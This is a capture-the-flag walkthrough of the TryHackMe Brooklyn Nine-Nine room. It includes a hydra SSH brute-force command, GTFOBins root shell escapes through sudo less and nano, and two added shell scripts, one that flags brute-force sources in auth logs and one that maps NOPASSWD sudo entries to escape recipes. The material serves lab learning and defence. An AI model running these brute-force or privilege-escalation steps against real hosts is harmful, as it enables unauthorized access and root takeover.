Brooklyn99-TryHackMe


This write-up covers the Brooklyn Nine-Nine room on TryHackMe.
The aim is to get the user and root flags. Let's start with Nmap:
nmap -sC -sV 10.10.10.123
Observations:
  • Open Ports 21,22,80
  • Anonymous FTP login allowed (reported by the ftp-anon script that -sC runs); it lists one readable file, note_to_jake.txt
  • Versions:
    • vsftpd 3.0.3
    • OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    • Apache httpd 2.4.29 ((Ubuntu))
Let's log in to the FTP server anonymously and read the file:
Observations:
  • Possible usernames: jake, amy and possibly holt
  • Jake's password is weak, which makes a wordlist attack worthwhile.
We can try to brute force jake's SSH password with hydra. -e nsr adds three extra guesses per user (empty password, the username itself and the username reversed) before the wordlist, and -t 4 keeps the number of parallel connections low so sshd does not start dropping them:
hydra -s 22 -v -q -l jake -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.10.123 ssh
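The hydra run above lands in the target's auth log as a burst of "Failed password" lines from one source, followed by one "Accepted password" when the wordlist hits. As an added example (not part of the original write-up), this POSIX shell script shows the defender's side of the same step: it counts failures per source over a constructed auth.log sample in Ubuntu's sshd format and reports which of those sources then logged in. The sample lines, hostname, IPs and ports are made up.

```shell
#!/bin/sh
# Defender's view of the hydra step (added example, not from the write-up).
# Constructed auth.log sample in Ubuntu's sshd format: twelve failures for jake
# from one source, two for a non-existent user from another, then one success.
SAMPLE_AUTH_LOG=$(
    i=0
    while [ "$i" -lt 12 ]; do
        printf 'Jun 14 10:01:%02d target sshd[1201]: Failed password for jake from 10.10.14.5 port %d ssh2\n' \
            "$i" $((41000 + i))
        i=$((i + 1))
    done
    printf 'Jun 14 10:01:20 target sshd[1230]: Failed password for invalid user admin from 10.10.14.9 port 50001 ssh2\n'
    printf 'Jun 14 10:01:21 target sshd[1230]: Failed password for invalid user admin from 10.10.14.9 port 50002 ssh2\n'
    printf 'Jun 14 10:01:30 target sshd[1240]: Accepted password for jake from 10.10.14.5 port 41100 ssh2\n'
)

# Read an auth log on stdin and print "<ip> <failures>" for every source with at
# least $1 failed password attempts (default 10), highest count first.
failed_ssh_sources() {
    threshold=${1:-10}
    awk -v thr="$threshold" '
        /sshd\[[0-9]+\]: Failed password for / {
            # "... Failed password for [invalid user] NAME from IP port N ssh2":
            # the source address is the field right after "from".
            for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i + 1)]++; break }
        }
        END { for (ip in fails) if (fails[ip] >= thr) print ip, fails[ip] }
    ' | sort -k2,2nr
}

# Read an auth log on stdin and print "<user> <ip>" for each accepted login that
# came from a source flagged by failed_ssh_sources: the brute force succeeded.
accepted_from_flagged() {
    log=$(cat)
    printf '%s\n' "$log" | failed_ssh_sources "${1:-10}" | while read -r ip _; do
        printf '%s\n' "$log" | awk -v ip="$ip" '
            /sshd\[[0-9]+\]: Accepted / {
                for (i = 1; i <= NF; i++)
                    if ($i == "from" && $(i + 1) == ip) print $(i - 1), ip
            }'
    done
}

# Stand-alone demo: which sources are hammering sshd, and did any of them get in?
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_ssh_sources 10
printf '%s\n' "$SAMPLE_AUTH_LOG" | accepted_from_flagged 10
```

On a real host the same functions run as `failed_ssh_sources 10 < /var/log/auth.log`; the threshold is the only tuning knob, and with -t 4 hydra crosses it within seconds, which is why the attack is loud even though it is cheap.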
Let's use these credentials to log in over SSH and look for the user flag:
ssh jake@10.10.10.123
find / -name user.txt 2>/dev/null
The user flag is in /home/holt/user.txt, which is world readable: jake can read inside another user's home directory, a misconfiguration in its own right. Let's submit this flag.
Now it is time for privilege escalation to get the root flag.
Let's check what jake can run with sudo:
sudo -l
jake can run /usr/bin/less as root without a password. GTFOBins (https://gtfobins.github.io)
lists a shell escape for less, and it turns out to be very simple: open any file as root (sudo less /etc/profile) and type !/bin/sh at the prompt; less spawns the shell as root.
The task says there are two main intended ways to root the box. Let's look for the other way to get the root flag:
On the main web page on port 80, viewing the page source gives a hint about steganography:
Download the image and let's check whether something is hidden in brooklyn99.jpg.
We will use the following tools:
And sure enough, we get the password for user holt.
Let's SSH to the machine as holt and check whether we can get the root flag this way too:
holt can run nano with sudo without a password. GTFOBins lists the equivalent escape for nano: open it as root (sudo nano), press Ctrl+R then Ctrl+X, and run reset; sh 1>&0 2>&0 to get a shell. Let's exploit this:
We get a root shell again.
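Both privilege-escalation paths on this box (less for jake, nano for holt) come from a single NOPASSWD line in sudo -l, so as an added example (not from the original write-up) here is a small POSIX shell audit that reads sudo -l output, pulls out every binary runnable as root without a password and prints the GTFOBins shell escape for the ones that have one. The sudo -l sample is constructed to match jake's entry as the write-up describes it; the hostname is made up, and the recipe table only covers the binaries this box hands out plus a few common neighbours.

```shell
#!/bin/sh
# Audit of `sudo -l` output for NOPASSWD shell escapes (added example, not from
# the write-up). Constructed sample modelled on jake's entry; hostname made up.
SAMPLE_SUDO_L='Matching Defaults entries for jake on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User jake may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/less'

# Read `sudo -l` output on stdin; print the basename of every command that can
# be run without a password, one per line (a rule may list several, comma-separated).
nopasswd_bins() {
    grep 'NOPASSWD:' | sed 's/.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' |
    while read -r entry; do
        set -- $entry          # first word is the command; any fixed args follow
        if [ -n "$1" ]; then basename "$1"; fi
    done
}

# GTFOBins shell escapes for the binaries this box hands out (and a few common
# neighbours). Prints the recipe and returns 0, or returns 1 if none is known.
escape_for() {
    case "$1" in
        less)   printf 'sudo %s /etc/profile, then type !/bin/sh at the : prompt\n' "$1" ;;
        nano)   printf 'sudo nano, then Ctrl+R Ctrl+X and run: reset; sh 1>&0 2>&0\n' ;;
        vi|vim) printf 'sudo %s, then type :!/bin/sh\n' "$1" ;;
        find)   printf 'sudo find . -exec /bin/sh \\; -quit\n' ;;
        ALL)    printf 'sudo -i (unrestricted)\n' ;;
        *)      return 1 ;;
    esac
}

# Read `sudo -l` output on stdin and print one verdict per NOPASSWD binary.
audit_sudo() {
    nopasswd_bins | while read -r bin; do
        if recipe=$(escape_for "$bin"); then
            printf 'ROOT via %s: %s\n' "$bin" "$recipe"
        else
            printf 'check manually: %s\n' "$bin"
        fi
    done
}

# Stand-alone demo on the constructed sample. On a live box: sudo -l | audit_sudo
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo
```

The fix on the defending side is the mirror image: a NOPASSWD rule for any program that can open a file, run a command or drop to a shell (pagers, editors, find, awk and the like) is a root account with extra steps, and should either be removed or replaced by a wrapper that takes no user-controlled arguments.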
Thanks for reading this. Good Luck.